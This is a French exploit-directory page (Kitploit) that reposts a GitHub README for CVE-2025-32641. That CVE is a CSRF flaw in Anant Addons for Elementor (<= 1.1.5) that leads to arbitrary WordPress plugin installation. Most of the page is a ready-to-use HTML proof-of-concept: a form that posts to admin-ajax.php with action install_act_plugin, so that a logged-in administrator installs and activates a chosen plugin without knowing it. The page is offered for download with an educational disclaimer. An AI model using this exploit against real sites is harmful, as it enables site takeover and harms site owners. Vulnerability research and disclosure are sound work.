Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32641 — Anant Addons pour Elementor <= 1.1.5 vulnérabilité de type CSRF menant à l'installation arbitraire de plugins | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-32641
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebArticles et RechercheApprentissage et Éducation
GitHubnxploited/cve-2025-32641

CVE-2025-32641

Anant Addons pour Elementor <= 1.1.5 vulnérabilité de type CSRF menant à l'installation arbitraire de plugins

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ Anant Addons pour Elementor <= 1.1.5 - CSRF vers installation arbitraire de plugin

🧨 CVE-2025-32641

Cross-Site Request Forgery (CSRF) vulnérabilité dans anantaddons' Anant Addons pour Elementor
Ce problème affecte les versions : de inconnue à 1.1.5

  • Score de base : 9.6 (CRITIQUE)
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔍 Description

Cette vulnérabilité permet à des attaquants non authentifiés d'effectuer une installation arbitraire de plugin au nom d'un administrateur connecté sans que celui-ci le sache.
En créant une page ou un formulaire malveillant, l'attaquant peut forcer silencieusement l'administrateur à installer et activer n'importe quel plugin depuis le dépôt WordPress.


💥 Impact

  • ✅ Installation arbitraire de plugin
  • ✅ Activation de plugin
  • ❌ Absence de protection nonce ou CSRF
  • ✅ Exploitable via une simple page HTML
  • ⚠️ Nécessite que l'administrateur soit connecté et ouvre la page malveillante

🧪 Preuve de concept HTML

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


🎯 Lorsqu'un administrateur connecté clique sur ce formulaire (ou qu'il se soumet automatiquement dans une page malveillante), le plugin sera installé et activé silencieusement.


⚠️ Avertissement

Ce dépôt et son contenu sont destinés uniquement à des fins éducatives et de recherche en sécurité.
L'auteur n'est pas responsable de toute mauvaise utilisation ou dommage causé par une utilisation inappropriée de ces informations.
Effectuez toujours les tests sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.


par : Nxploited | Khaled ALenazi

Télécharger l’outil